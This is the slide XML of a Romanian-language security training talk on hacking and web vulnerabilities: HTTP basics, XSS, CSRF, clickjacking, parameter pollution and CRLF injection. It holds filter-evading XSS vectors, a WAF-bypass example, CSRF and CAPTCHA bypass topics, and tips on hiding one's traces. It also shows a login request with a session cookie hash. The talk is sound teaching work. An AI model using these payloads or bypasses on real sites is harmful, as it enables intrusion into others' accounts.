              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>14) &lt;style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;*[{}@import'test.css?]&lt;/style&gt;X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>XXX&lt;style&gt;*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}&lt;/style&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>15) &lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;({set/**/$($){_/**/setter=$,_=1}}).$=alert&lt;/script&gt;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28900" y="914400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HTML 5 XSS Vectors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591893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175260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Cross Site Request Forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3238500" y="2971800"/>
            <a:ext cx="304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mtClean="0"/>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6600"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34031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1066799"/>
            <a:ext cx="510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Cross Site Request Forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1981200"/>
            <a:ext cx="65532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smtClean="0"/>
              <a:t>Scurta descriere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Cum se poate exploata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   1) GET: delete.php?user=Vasile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>   2) POST: change password, post comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Protectie folosind token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Protectie folosind CAPTCHA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Protectie cerand parola de administrare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>CSRF token bypass folosind XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>CAPTCHA bypass folosind Deathbycaptcha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20622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838196"/>
            <a:ext cx="3794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Alte vulnerabilitati</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1453452"/>
            <a:ext cx="739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Clickjacking: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DEMO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Scurta descriere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La ce se foloseste: Like-uri Facebook…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HTTP X-Frame-Option: Same-Origin sau Deny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297650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HTTP Parameter Pollution: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Scurta descriere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La ce se foloseste: Web Application Firewall bypass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Exemplu: page.php?id=&lt;scri&amp;id=ipt&gt;alert(1)&amp;id=&lt;/script&gt;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GET/POST cu acelasi nume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Folosirea delimitatorilor pentru noi variabile: Vasile&amp;var=aaa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4360" y="4730826"/>
            <a:ext cx="647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CRLF Injection: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Scurta descriere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Cel mai adesea: formularele de contact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5654156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CSS History Stealing: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Scurta descriere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Ce face: verifica daca un site a fost vizitat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1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990600"/>
            <a:ext cx="403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mtClean="0"/>
              <a:t>Prezentare</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2048856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Ionut Gabriel Popescu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="32004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smtClean="0"/>
              <a:t>Security Trainer @ Microsoft Student Partners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Administrator @ Romanian Security Team</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4857095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Lucrari publicate: </a:t>
            </a:r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883920" y="5410200"/>
            <a:ext cx="765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smtClean="0"/>
              <a:t>Vulnerabilitati web si securizarea acestora - 2009</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Folosire XSS pentru a trece de protectia CSRF - 2009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05870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74676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Resurse utile</a:t>
            </a:r>
            <a:endParaRPr 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228600" y="1785878"/>
            <a:ext cx="868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000" b="1" smtClean="0"/>
              <a:t>Romanian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>Security Team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://rstcenter.com/forum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>Hack a Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.hackaserver.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>Defcamp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://defcamp.ro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Web Application Security Project - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.owasp.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Exploit-DB - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.exploit-db.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>SecurityTube - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.securitytube.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Packet storm - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://packetstormsecurity.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>SecLists - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://seclists.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Phrack - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>http://www.phrack.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="5097959"/>
            <a:ext cx="281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/>
              <a:t>Intrebari? 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53980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1219200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/>
              <a:t>Hacking si Securitate IT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="670560" y="2514600"/>
            <a:ext cx="81686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smtClean="0"/>
              <a:t>Ce este hackingul?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Hacking vs Securitate IT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Trecut si prezent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Etica: totul cu un scop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Hackeri de carton: exploit-uri, scannere, Havij</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Google dorks: “inurl: page.php?id=“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Mass-media despre hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Ilegal: ascundeti-va datele: proxy, VPN, SOCKS, log-uri</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160156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514600"/>
            <a:ext cx="838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smtClean="0"/>
              <a:t>Script kiddies – Anonymous, lulzsec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>“Hackeri” – ZFO/Happy Ninjas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Hackeri:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>  1. muts           -&gt; Backtrack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>  2. Fyodor        -&gt; nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>  3. HD Moore -&gt; Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Phrack: rpt ‘98 – SQL Injection, Thomas Lopatic ‘95 - BOF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95500" y="1219200"/>
            <a:ext cx="518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/>
              <a:t>Exemple de hackeri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6053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9360" y="9906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Exemplu de request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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81200"/>
            <a:ext cx="4794769" cy="44854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28360" y="2133600"/>
            <a:ext cx="2971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Browser: Internet Explorer, Mozilla Firefox, Google Chrome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Web server: IIS, Apache, ngix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Database:MSSQL, MySQL, Oracle</a:t>
            </a:r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2250816" y="2362200"/>
            <a:ext cx="110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HTTP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529041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371600"/>
            <a:ext cx="86106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GET /en-us/default.aspx HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="140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Host: www.microsoft.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="140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User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="140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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="140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Accept-Language: en-us,en;q=0.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="140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Accept-Encoding: gzip, deflate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="140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Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="140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Cookie: WT_FPC=id=107.16.216.86-873508336.30201634:lv=1333742585072:ss=1333742585072; WT_NVR=0=/:1=learning:2=learning/en|education/facultyconnection|download/en:3=learning/en/us|romania/educatie/msdnaa_msdn_academic_alliance|resources/sharedsource/windowsacademic|security/portal/threat; .....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Cache-Control: no-cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Pragma: no-cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Content-Type: text/html; charset=utf-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Content-Encoding: gzip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Expires: -1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Server: Microsoft-IIS/7.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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X-AspNet-Version: 2.0.50727</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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X-Powered-By: ASP.NET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Date: Sun, 08 Apr 2012 19:44:52 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="14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Content-Length: 33902</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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500" y="6858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Exemplu HTTP GET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68938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310640"/>
            <a:ext cx="7696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POST /takelogin.php HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="160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Host: filelist.ro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="160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User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="160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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="160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Accept-Language: en-us,en;q=0.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="160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Accept-Encoding: gzip, deflate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="160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Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="160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Content-Type: application/x-www-form-urlencoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="160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Content-Length: 35</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="160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username=PoyoVL&amp;password=aicivineparola</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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HTTP/1.1 302 Found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Server: LBA T2900 LINUX SECURITY GROUP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Date: Sun, 08 Apr 2012 19:54:38 GMT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Content-Type: text/html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Set-Cookie: uid=279397; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; httponly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Set-Cookie: pass=d19adc1ed03183d8254e6c13de9a954d; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; httponly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Location: http://filelist.ro/my.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1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Content-Length: 20</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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3200" y="7417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Exemplu HTTP POST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4735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80772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Vulnerabilitati</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="16764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smtClean="0"/>
              <a:t>Ce e o vulnerabilitate?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Cine e vinovatul?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Vulnerabilitati pe parte de client si pe parte de server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Vulnerabilitati logice: verificare pret (negativ)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Man in the middle, session stealing, SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Parametri in care pot sa apara probleme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423672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Despre ce vulnerabilitati (client) vom discuta azi:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Insecure Cookie Handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>XSS (Cross Site Scripting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
